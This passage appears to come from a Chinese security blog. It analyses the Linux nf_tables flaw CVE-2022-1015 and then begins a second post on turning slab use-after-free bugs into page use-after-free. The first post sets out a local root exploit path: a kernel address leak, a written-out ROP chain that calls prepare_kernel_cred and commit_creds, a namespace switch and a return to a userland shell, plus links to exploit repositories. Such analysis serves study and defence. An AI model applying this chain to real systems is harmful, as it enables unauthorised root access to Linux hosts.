<p>属性的实际内容则紧跟在头部之后。</p>
<h1 id="三、漏洞成因"><a href="#三、漏洞成因" class="headerlink" title="三、漏洞成因"></a>三、漏洞成因</h1><p>漏洞类型是整形溢出导致的栈溢出,同时存在于 nft_validate_register_store 及 nft_validate_register_load 两个函数,以下仅通过 nft_validate_register_load 进行解释,nft_validate_register_store 处的情况大同小异。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* net/netfilter/nf_tables_api.c */</span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">nft_validate_register_load</span><span class="params">(<span class="keyword">enum</span> nft_registers reg, <span class="keyword">unsigned</span> <span class="keyword">int</span> len)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="comment">// 这里检查是否在读取 verdict register, 这是不被允许的</span></span><br><span class="line"> <span class="keyword">if</span> (reg < NFT_REG_1 * NFT_REG_SIZE / NFT_REG32_SIZE)</span><br><span class="line"> <span class="keyword">return</span> -EINVAL;</span><br><span class="line"> <span class="keyword">if</span> (len == <span class="number">0</span>) <span class="comment">// len 不可以是 0</span></span><br><span class="line"> <span class="keyword">return</span> -EINVAL;</span><br><span class="line"> <span class="comment">// 由于 reg 的范围没有限制好,导致整形溢出</span></span><br><span class="line"> <span class="keyword">if</span> (reg * NFT_REG32_SIZE + len > sizeof_field(struct nft_regs, data))</span><br><span class="line"> <span class="keyword">return</span> -ERANGE;</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>由于 reg 的范围没有限制好,导致 reg * NFT_REG32_SIZE + len 整形溢出。</p>
<p>reg 的取值范围分析可以看 nft_validate_register_load 的调用处:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* net/netfilter/nf_tables_api.c */</span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">nft_parse_register_load</span><span class="params">(<span class="keyword">const</span> struct nlattr *attr, u8 *sreg, u32 len)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> u32 reg; <span class="comment">// 4 byte register variable</span></span><br><span class="line"> <span class="keyword">int</span> err;</span><br><span class="line"></span><br><span class="line"> reg = nft_parse_register(attr); <span class="comment">// gets the register index from an attribute</span></span><br><span class="line"> err = nft_validate_register_load(reg, len); <span class="comment">// calls the validating function</span></span><br><span class="line"> <span class="keyword">if</span> (err < <span class="number">0</span>) <span class="comment">// if the validating function didn't return an error everything is fine</span></span><br><span class="line"> <span class="keyword">return</span> err;</span><br><span class="line"></span><br><span class="line"> *sreg = reg; <span class="comment">// save the register index into sreg (a pointer that is provided as an argument)</span></span><br><span class="line"> <span class="comment">// sreg = source register -> the register from which we read</span></span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br><span class="line">EXPORT_SYMBOL_GPL(nft_parse_register_load);</span><br></pre></td></tr></table></figure>
<p>可以看到 reg 来自 netlink 属性 attr,通过 nft_parse_register 函数解析出来,再传递给 nft_validate_register_load 函数。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* net/netfilter/nf_tables_api.c */</span></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * nft_parse_register - parse a register value from a netlink attribute</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * @attr: netlink attribute</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * Parse and translate a register value from a netlink attribute.</span></span><br><span class="line"><span class="comment"> * Registers used to be 128 bit wide, these register numbers will be</span></span><br><span class="line"><span class="comment"> * mapped to the corresponding 32 bit register numbers.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">unsigned</span> <span class="keyword">int</span> <span class="title">nft_parse_register</span><span class="params">(<span class="keyword">const</span> struct nlattr *attr)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">int</span> reg;</span><br><span class="line"></span><br><span class="line"> <span class="comment">// from include/uapi/linux/netfilter/nf_tables.h</span></span><br><span class="line"> <span class="comment">// NFT_REG_SIZE = 16 (16 bytes)</span></span><br><span class="line"> <span class="comment">// NFT_REG32_SIZE = 4 (4 bytes)</span></span><br><span class="line"> reg = ntohl(nla_get_be32(attr));</span><br><span class="line"> <span class="keyword">switch</span> (reg) {</span><br><span class="line"> <span class="keyword">case</span> NFT_REG_VERDICT...NFT_REG_4:</span><br><span class="line"> <span class="keyword">return</span> reg * NFT_REG_SIZE / NFT_REG32_SIZE; </span><br><span class="line"> <span class="keyword">default</span>:</span><br><span class="line"> <span class="keyword">return</span> reg + NFT_REG_SIZE / NFT_REG32_SIZE - NFT_REG32_00;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>在 nft_parse_register 中,明显没有对 reg 范围做任何限制,传入在 NFT_REG_VERDICT…NFT_REG_4 之外的值,函数最终都会返回 reg + NFT_REG_SIZE / NFT_REG32_SIZE - NFT_REG32_00,也就是 reg - 4。</p>
<p>最终,nft_parse_register_load 传回的 reg 会作为 index 用于访问 nft_do_chain 函数中的 nft_regs 局部变量,导致栈溢出。由于 nft_validate_register_store 及 nft_validate_register_load 两个函数都存在漏洞,因此可以同时越界读和写 nft_regs 之后的栈内存。</p>
<h1 id="四、EXP思路"><a href="#四、EXP思路" class="headerlink" title="四、EXP思路"></a>四、EXP思路</h1><p>EXP 中存在大量的算术运算计算各种地址位移,所针对的是特定的漏洞及特定的内核映像,在此谈论这些意义不大,因此本文只谈通用的思路。想要更细致研究的话可以参考 EXP 仓库:</p>
<p>https://github.com/pqlx/CVE-2022-1015</p>
<p>https://github.com/ysanatomic/CVE-2022-1015</p>
<p>通常,由于 canary 的存在,memcpy 等函数引发的栈内存越界写会难以利用,因为 memcpy 的起始地址通常是某个局部变量,要覆写到返回地址则必定会覆写 canary。这个漏洞可以利用的原因就是越界读写的起始地址可以通过传入的 reg 值设定,因此可以越过 canary,从 canary 之后、返回地址之前的地址开始覆写。</p>
<h2 id="4-1-泄露内核地址"><a href="#4-1-泄露内核地址" class="headerlink" title="4.1 泄露内核地址"></a>4.1 泄露内核地址</h2><p>首先通过动态调试寻找栈上的内核地址,再通过 nft_bitwise 这一 expression 越界读取该范围的内存,保存进 nft_regs 的正常范围内存内,这样才能通过 nft_payload_set 将 nft_regs 正常范围内存的内容复制到数据包中,经由用户态的 socket 接收该数据包获取到内核地址,以绕过 KASLR 保护。</p>
<h2 id="4-2-代码执行"><a href="#4-2-代码执行" class="headerlink" title="4.2 代码执行"></a>4.2 代码执行</h2><p>通过 nft_payload 将通过数据包发送的 ROP 链复制到 nft_regs 的正常范围内存内,再通过 nft_bitwise 越界写以覆盖到返回地址。为了不覆写到 canary,起始地址必须限制在 canary 之后,返回地址之前。</p>
<p>ROP 链的构造如下:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">int</span> offset = <span class="number">0</span>;</span><br><span class="line"><span class="comment">// clearing interrupts</span></span><br><span class="line">payload[offset++] = kbase + cli_ret;</span><br><span class="line"></span><br><span class="line"><span class="comment">// preparing credentials</span></span><br><span class="line">payload[offset++] = kbase + pop_rdi_ret; </span><br><span class="line">payload[offset++] = <span class="number">0x0</span>; <span class="comment">// first argument of prepare_kernel_cred</span></span><br><span class="line">payload[offset++] = kbase + prepare_kernel_cred;</span><br><span class="line"></span><br><span class="line"><span class="comment">// commiting credentials</span></span><br><span class="line">payload[offset++] = kbase + mov_rdi_rax_ret;</span><br><span class="line">payload[offset++] = kbase + commit_creds;</span><br><span class="line"></span><br><span class="line"><span class="comment">// switching namespaces</span></span><br><span class="line">payload[offset++] = kbase + pop_rdi_ret;</span><br><span class="line">payload[offset++] = process_id;</span><br><span class="line">payload[offset++] = kbase + find_task_by_vpid;</span><br><span class="line">payload[offset++] = kbase + mov_rdi_rax_ret;</span><br><span class="line">payload[offset++] = kbase + pop_rsi_ret;</span><br><span class="line">payload[offset++] = kbase + ini;</span><br><span class="line">payload[offset++] = kbase + switch_task_namespaces;</span><br><span class="line"></span><br><span class="line"><span class="comment">// returning to userland</span></span><br><span class="line">payload[offset++] = kbase + swapgs_restore_regs_and_return_to_usermode;</span><br><span class="line">payload[offset++] = (<span class="keyword">unsigned</span> <span class="keyword">long</span>)spawnShell;</span><br><span class="line">payload[offset++] = user_cs;</span><br><span class="line">payload[offset++] = user_rflags;</span><br><span class="line">payload[offset++] = user_sp;</span><br><span class="line">payload[offset++] = user_ss;</span><br></pre></td></tr></table></figure>
<p>先清空 interrupt 标志位,屏蔽可屏蔽中断,防止 ROP 被打断。</p>
<p>之后通过调用 prepare_kernel_cred(0) 准备权限为 root 的进程 cred。prepare_kernel_cred 是内核中专门用来准备进程 cred 的,进程 cred 代表了进程的各种权限。当对 prepare_kernel_cred 传入的参数为 0 时,返回的就是 root 权限的进程 cred。</p>
<p>再通过调用 switch_task_namespaces(find_task_by_vpid(process_id), &init_nsproxy) 将 EXP 进程的名称空间切换到 init_nsproxy。其中 process_id 为 EXP 进程的 pid,有许多办法可在用户态获取并保存下来,find_task_by_vpid 则会返回指定 pid 的 task_struct,init_nsproxy 为 init 进程也就是第一个进程的名称空间。由于使用 nf_tables 需要切换到新的 user + network 名称空间,所以这一步是必要的。当然,也可以在获得 root 权限后返回到用户态时再切换。</p>
<p>最后是返回到用户态,通过 swapgs; iret; 这一 gadget。需要在栈上依次准备好 IP、CS、EFLAGS、SP、SS 寄存器的内容,其中,IP 指向可弹出一个 shell 的函数,该函数通过调用 system(“/bin/sh”) 获得 shell。</p>
<h2 id="4-3-离开-softirq-上下文"><a href="#4-3-离开-softirq-上下文" class="headerlink" title="4.3 离开 softirq 上下文"></a>4.3 离开 softirq 上下文</h2><p>在漏洞发现者的 <a href="https://github.com/pqlx/CVE-2022-1015" target="_blank" rel="noopener">EXP</a> 中,在上一节的清空 interrupt 标志位操作后,还增加了一步离开 softirq 上下文的操作,这是因为在 EXP 作者的利用环境中,nft_do_chain 在 NET_RX_SOFTIRQ 类型 irqsoft 上下文中被调用。这一步不是必须的,但不执行这一步会让系统变得不稳定。</p>
<p>进入 softirq 的逻辑实现在 do_softirq 函数中:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * Macro to invoke __do_softirq on the irq stack. This is only called from</span></span><br><span class="line"><span class="comment"> * task context when bottom halves are about to be reenabled and soft</span></span><br><span class="line"><span class="comment"> * interrupts are pending to be processed. The interrupt stack cannot be in</span></span><br><span class="line"><span class="comment"> * use here.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> do_softirq_own_stack() \</span></span><br><span class="line">{ \</span><br><span class="line"> __this_cpu_write(hardirq_stack_inuse, <span class="literal">true</span>); \</span><br><span class="line"> call_on_irqstack(__do_softirq, ASM_CALL_ARG0); \</span><br><span class="line"> __this_cpu_write(hardirq_stack_inuse, <span class="literal">false</span>); \</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">---</span><br><span class="line"></span><br><span class="line"><span class="function">asmlinkage __visible <span class="keyword">void</span> <span class="title">do_softirq</span><span class="params">(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> __u32 pending;</span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">long</span> flags;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (in_interrupt())</span><br><span class="line"> <span class="keyword">return</span>;</span><br><span class="line"></span><br><span class="line"> local_irq_save(flags);</span><br><span class="line"></span><br><span class="line"> pending = local_softirq_pending();</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (pending && !ksoftirqd_running(pending))</span><br><span class="line"> do_softirq_own_stack();</span><br><span class="line"></span><br><span class="line"> local_irq_restore(flags);</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br></pre></td><td class="code"><pre><span class="line">asmlinkage __visible <span class="keyword">void</span> __softirq_entry __do_softirq(<span class="keyword">void</span>)</span><br><span class="line">{</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">long</span> <span class="built_in">end</span> = jiffies + MAX_SOFTIRQ_TIME;</span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">long</span> old_flags = current->flags;</span><br><span class="line"> <span class="keyword">int</span> max_restart = MAX_SOFTIRQ_RESTART;</span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">softirq_action</span> *<span class="title">h</span>;</span></span><br><span class="line"> <span class="keyword">bool</span> in_hardirq;</span><br><span class="line"> __u32 pending;</span><br><span class="line"> <span class="keyword">int</span> softirq_bit;</span><br><span class="line"></span><br><span class="line"> <span class="comment">/*</span></span><br><span class="line"><span class="comment"> * Mask out PF_MEMALLOC as the current task context is borrowed for the</span></span><br><span class="line"><span class="comment"> * softirq. A softirq handled, such as network RX, might set PF_MEMALLOC</span></span><br><span class="line"><span class="comment"> * again if the socket is related to swapping.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"> current->flags &= ~PF_MEMALLOC;</span><br><span class="line"> pending = local_softirq_pending();</span><br><span class="line"></span><br><span class="line"> softirq_handle_begin();</span><br><span class="line"> in_hardirq = lockdep_softirq_start();</span><br><span class="line"> </span><br><span class="line"> account_softirq_enter(current);</span><br><span class="line"></span><br><span class="line"> restart:</span><br><span class="line"> <span class="comment">/* Reset the pending bitmask before enabling irqs */</span></span><br><span class="line"> set_softirq_pending(<span class="number">0</span>);</span><br><span class="line"> </span><br><span class="line"> local_irq_enable();</span><br><span class="line"></span><br><span class="line"> h = softirq_vec;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">while</span> ((softirq_bit = ffs(pending))) {</span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">int</span> vec_nr;</span><br><span class="line"> <span class="keyword">int</span> prev_count;</span><br><span class="line"></span><br><span class="line"> h += softirq_bit - <span class="number">1</span>;</span><br><span class="line"></span><br><span class="line"> vec_nr = h - softirq_vec;</span><br><span class="line"> prev_count = preempt_count();</span><br><span class="line"></span><br><span class="line"> kstat_incr_softirqs_this_cpu(vec_nr);</span><br><span class="line"></span><br><span class="line"> trace_softirq_entry(vec_nr);</span><br><span class="line"> h->action(h); <span class="comment">// <---------- net_rx_action is called here</span></span><br><span class="line"> trace_softirq_exit(vec_nr);</span><br><span class="line"> <span class="keyword">if</span> (unlikely(prev_count != preempt_count())) {</span><br><span class="line"> pr_err(<span class="string">"huh, entered softirq %u %s %p with preempt_count %08x, exited with %08x?\n"</span>,</span><br><span class="line"> vec_nr, softirq_to_name[vec_nr], h->action,</span><br><span class="line"> prev_count, preempt_count());</span><br><span class="line"> preempt_count_set(prev_count);</span><br><span class="line"> }</span><br><span class="line"> h++;</span><br><span class="line"> pending >>= softirq_bit;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (!IS_ENABLED(CONFIG_PREEMPT_RT) &&</span><br><span class="line"> __this_cpu_read(ksoftirqd) == current)</span><br><span class="line"> rcu_softirq_qs();</span><br><span class="line"></span><br><span class="line"> local_irq_disable();</span><br><span class="line"></span><br><span class="line"> pending = local_softirq_pending();</span><br><span class="line"> <span class="keyword">if</span> (pending) {</span><br><span class="line"> <span class="keyword">if</span> (time_before(jiffies, <span class="built_in">end</span>) && !need_resched() &&</span><br><span class="line"> --max_restart)</span><br><span class="line"> <span class="keyword">goto</span> restart;</span><br><span class="line"></span><br><span class="line"> wakeup_softirqd();</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> account_softirq_exit(current);</span><br><span class="line"> lockdep_softirq_end(in_hardirq);</span><br><span class="line"> softirq_handle_end();</span><br><span class="line"> current_restore_flags(old_flags, PF_MEMALLOC);</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>在 soft_irq 处理完毕后,通过 local_irq_disable() 关中断,再通过 softirq_handle_end() 调整 preempt_count,原来的系统调用栈在 do_softirq 函数中通过调用 do_softirq_own_stack 宏恢复,最后重新打开中断。</p>
<p>由于 softirq_handle_end() 被内联在 __do_softirq() 中,在此 <a href="https://github.com/pqlx/CVE-2022-1015" target="_blank" rel="noopener">EXP</a> 中,作者仅通过 ROP 将控制流引导至 __do_softirq() 调用 softirq_handle_end() 处,调整了 preempt_count,并称可以无副作用地离开 softirq 的上下文,回到进程上下文。</p>
<h1 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h1><p><a href="https://blog.dbouman.nl/2022/04/02/How-The-Tables-Have-Turned-CVE-2022-1015-1016/" target="_blank" rel="noopener">How The Tables Have Turned: An analysis of two new Linux vulnerabilities in nf_tables</a></p>
<p><a href="https://ysanatomic.github.io/cve-2022-1015/" target="_blank" rel="noopener">CVE-2022-1015: A validation flaw in Netfilter leading to Local Privilege Escalation</a></p>
<p><a href="https://ysanatomic.github.io/netfilter_nf_tables/" target="_blank" rel="noopener">Dissecting the Linux Firewall: Introduction to Netfilter’s nf_tables</a></p>
<p><a href="https://www.digitalocean.com/community/tutorials/a-deep-dive-into-iptables-and-netfilter-architecture" target="_blank" rel="noopener">A Deep Dive into Iptables and Netfilter Architecture</a></p>
<p><a href="https://arthurchiao.art/blog/conntrack-design-and-implementation/" target="_blank" rel="noopener">Connection Tracking (conntrack): Design and Implementation Inside Linux Kernel</a></p>
<p><a href="https://www.kernel.org/doc/html/latest/userspace-api/netlink/intro.html" target="_blank" rel="noopener">Introduction to Netlink — The Linux Kernel documentation</a></p>
<p><a href="https://man7.org/linux/man-pages/man7/netlink.7.html" target="_blank" rel="noopener">netlink(7) - Linux manual page</a></p>
<p><a href="https://wiki.nftables.org/wiki-nftables/index.php/Portal:DeveloperDocs/nftables_internals" target="_blank" rel="noopener">Portal:DeveloperDocs/nftables internals - nftables wiki</a></p>
</div>
<footer class="article-footer">
<a data-url="http://yoursite.com/2023/02/06/cve-2022-1015/" data-id="cmd5slr2k000m0lo18hacf0ae" class="article-share-link">Share</a>
</footer>
</div>
</article>
<article id="post-2023/02/01/slabUaf-to-pageUaf" class="article article-type-post" itemscope itemprop="blogPost">
<div class="article-meta">
<a href="2023/02/01/slabUaf-to-pageUaf/" class="article-date">
<time datetime="2023-02-01T14:00:00.000Z" itemprop="datePublished">2023-02-01</time>
</a>
</div>
<div class="article-inner">
<header class="article-header">
<h1 itemprop="name">
<a class="article-title" href="2023/02/01/slabUaf-to-pageUaf/">Linux 内核利用技巧 Slab UAF to Page UAF</a>
</h1>
</header>
<div class="article-entry" itemprop="articleBody">
<p>author: 熊潇 of <a href="https://www.iceswordlab.com/about/" target="_blank" rel="noopener">IceSword Lab</a></p>
<p>本文研究了内核编译选项 <code>CONFIG_SLAB_MERGE_DEFAULT</code> 对 <code>kmem_cache</code> 分配的影响.</p>
<p>以及开启该配置的时候, slab UAF 的一种利用方案 (<a href="https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/" target="_blank" rel="noopener">方案来源</a>, 本文内容基于 Linux-5.10.90).</p>
<p>阅读前, 需要对 slab/slub, Buddy system 有基本的了解.</p>
<ul>
<li>Part. 1: 源码分析</li>
<li>Part. 2: <code>CONFIG_SLAB_MERGE_DEFAULT</code> 配置对比测试</li>
<li>Part. 3: 跨 slab 的 UAF 利用示例</li>
</ul>
<p>Keyword: slab/slub | CONFIG_SLAB_MERGE_DEFAULT | Linux kernel exploit</p>
<h2 id="Part-1"><a href="#Part-1" class="headerlink" title="Part. 1"></a>Part. 1</h2><p>创建 <code>struct kmem_cache</code> 的时候,有两种情况:</p>
<ul>
<li><code>__kmem_cache_alias</code> : 跟现有的共用(mergeable)</li>
<li><code>create_cache</code> : 创建一个新的</li>
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">kmem_cache_create(..)</span><br><span class="line"> kmem_cache_create_usercopy(..)</span><br><span class="line"> <span class="keyword">if</span> (!usersize) <span class="comment">// usersize == 0</span></span><br><span class="line"> s = __kmem_cache_alias(name, <span class="built_in">size</span>, align, flags, ctor); <span class="comment">// s 为 NULL 才会创建新的 slab</span></span><br><span class="line"> <span class="keyword">if</span> (s)</span><br><span class="line"> <span class="keyword">goto</span> out_unlock;</span><br><span class="line"> create_cache()</span><br><span class="line"></span><br><span class="line"><span class="comment">// 进入 `__kmem_cache_alias` 看看</span></span><br><span class="line">__kmem_cache_alias(..)</span><br><span class="line"> <span class="comment">// 检查 CONFIG_SLAB_MERGE_DEFAULT 配置;</span></span><br><span class="line"> <span class="comment">// 如果开启了,则通过 sysfs_slab_alias 找到已经创建的相同大小的 slab 作为替代</span></span><br><span class="line"> s = find_mergeable(..)</span><br><span class="line"> list_for_each_entry_reverse(s, &slab_caches, <span class="built_in">list</span>) {</span><br><span class="line"> <span class="keyword">if</span> (slab_unmergeable(s)) <span class="comment">// slab_nomerge 为 true 时 return 1;</span></span><br><span class="line"> <span class="keyword">continue</span>; </span><br><span class="line"> ...</span><br><span class="line"> <span class="keyword">return</span> s;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">NULL</span>; <span class="comment">// slab_nomerge 为 true 的时候返回 NULL</span></span><br><span class="line"> <span class="keyword">if</span>(s) </span><br><span class="line"> ... </span><br><span class="line"> sysfs_slab_alias(..)</span><br><span class="line"> <span class="keyword">return</span> s;</span><br><span class="line"></span><br><span class="line"><span class="comment">// CONFIG_SLAB_MERGE_DEFAULT=y -> slab_nomerge == false</span></span><br><span class="line"><span class="comment">// CONFIG_SLAB_MERGE_DEFAULT=n -> slab_nomerge == true</span></span><br><span class="line"><span class="keyword">static</span> <span class="keyword">bool</span> slab_nomerge = !IS_ENABLED(CONFIG_SLAB_MERGE_DEFAULT);</span><br><span class="line"></span><br><span class="line"><span class="comment">// https://cateee.net/lkddb/web-lkddb/SLAB_MERGE_DEFAULT.html</span></span><br><span class="line"><span class="comment">// CONFIG_SLAB_MERGE_DEFAULT: Allow slab caches to be merged</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// For reduced kernel memory fragmentation, slab caches can be merged </span></span><br><span class="line"><span class="comment">// when they share the same size and other characteristics. </span></span><br><span class="line"><span class="comment">// This carries a risk of kernel heap overflows being able to </span></span><br><span class="line"><span class="comment">// overwrite objects from merged caches (and more easily control cache layout), </span></span><br><span class="line"><span class="comment">// which makes such heap attacks easier to exploit by attackers.</span></span><br></pre></td></tr></table></figure>
<h2 id="Part-2"><a href="#Part-2" class="headerlink" title="Part.2"></a>Part.2</h2><p>测试 <code>CONFIG_SLAB_MERGE_DEFAULT</code> 的影响</p>
<p>Host 主机(开启了配置):</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">└─[$] uname -r</span><br><span class="line"><span class="number">5.15</span><span class="number">.0</span><span class="number">-52</span>-generic</span><br><span class="line"></span><br><span class="line">└─[$] cat /boot/<span class="built_in">config</span>-$(uname -r) |grep CONFIG_SLAB_MERGE_DEFAULT </span><br><span class="line">CONFIG_SLAB_MERGE_DEFAULT=y</span><br></pre></td></tr></table></figure>
<p>VM (未开启配置): </p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">➜ ~ uname -r</span><br><span class="line"><span class="number">5.10</span><span class="number">.90</span></span><br><span class="line"></span><br><span class="line">└─[$] cat .<span class="built_in">config</span>|grep CONFIG_SLAB_MERGE_DEFAULT </span><br><span class="line"># CONFIG_SLAB_MERGE_DEFAULT is <span class="keyword">not</span> <span class="built_in">set</span></span><br></pre></td></tr></table></figure>
<ul>
<li><p>code</p>
